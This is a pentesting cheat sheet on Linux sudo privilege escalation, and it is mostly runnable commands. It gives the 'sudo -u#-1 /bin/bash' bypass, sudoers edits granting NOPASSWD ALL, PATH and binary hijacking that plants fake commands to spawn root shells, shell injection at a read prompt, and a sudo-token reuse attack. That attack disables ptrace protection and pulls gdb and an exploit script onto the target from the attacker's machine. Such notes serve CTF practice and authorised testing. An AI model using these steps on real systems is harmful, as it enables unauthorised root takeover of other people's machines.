Sudo Privilege Escalation

Last modified: 2023-10-30

Privilege Escalation

Sudo commands might be vulnerable to privilege escalation (PrivEsc).


GTFOBins provides a wide variety of payloads to privilege escalation.
So it's recommended to look for in there.



sudo --version

If the sudo version <=1.28, try the following command.

sudo -u#-1 /bin/bash

As Another Users

sudo su root
sudo -u john whoami
# -s: run shell as target user
sudo -s

List Privileges Commands

We may be able to see the commands available as another user.

sudo -l
sudo -ll

# Specify hostname
sudo -h <host-name> -l
# Execute via the hostname
sudo -h <host-name> /bin/bash

Also we might see from following files.

cat /etc/sudoers
cat /etc/sudoers.d/usersgroup

If we find the following result for sudoers,

(ALL, !root) NOPASSWD: /bin/bash

We might be able to get a root shell as follow.

sudo -u#-1 /bin/bash

Edit Sudoers

If we have permission to write /etc/sudoers, we can modify this file.

sudo visudo -f /etc/sudoers

Now add the following line to allow us to execute all commands as root.
Assume we logged in as john.

# Unrestriction
# or
john ALL=(root) NOPASSWD: ALL

# Specific command as root
john ALL=(root) NOPASSWD: /usr/bin/passwd

Command Forgery (NOPASSWD)

If you are allowed to execute some command, you can forge the contents of the command.
First off, check the properties.

sudo -l
(root) NOPASSWD: somecmd

If you can confirm that it can be executed as root without password, create the same named command in the arbitrary folder in which you can write files.

# option 1
echo /bin/sh > /tmp/somecmd

Next, change the permission for allowing to execute it.
And add the path to the environment.

chmod +x /tmp/somecmd
export PATH=/tmp:$PATH

Now execute the command as root.

sudo somecmd
# root

Command Forgery (SETENV, NOPASSWD)

If you found there is a SETENV: in sudoers, you can set the PATH when running the command.

sudo -l
(root) SETENV: NOPASSWD: somecmd

As the previous section, prepare the payload.

echo '/bin/bash -p' > /tmp/somecmd
chmod +x /tmp/somecmd

Now run the command as root with setting the PATH.

sudo PATH=/tmp:$PATH somecmd

Command Path Hijacking

sudo -l


(root) python /home/user/

If we can execute some command as root but env_reset and secure_path are set, we cannot override the PATH environment variable.
Instead we need to check if we have permission to write each path.

ls -al /usr/local/
ls -al /usr/
ls -al /

Assume we can write an arbitrary binary file under /usr/sbin, we can create a payload in there.
For example, we create a python binary under /usr/sbin.

echo /bin/bash > /usr/sbin/python
chmod +x /usr/sbin/python

Then execute the sudo command.

sudo python /home/user/

Now we should get a root shell.

Shell in Prompt


read -p "What's you name: "

If we found there is another user’s script which can be executed as root, you can input `/bin/bash -i` to get a shell as another user.

Reuse Sudo Tokens


If the current user executes some command using sudo, we might be able to escalate to root privilege. Check if no restriction on ptrace.

cat /proc/sys/kernel/yama/ptrace_scope

# We can temporariliy set 0 if we have permissions.
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope

If the target system does not have gdb binary, we can download it.

# In local machine, download the debian package.
wget -O gdb.deb
python3 -m http.server

# In remote machine, download the deb package and extract it.
dpkg -x gdb.deb ~

Next, prepare the exploit script from the repo and execute it.

# In local machine, download the shell script to exploit.
python3 -m http.server

# In remote machine, download it and execute.

After that, we can spawn the root shell.

sudo su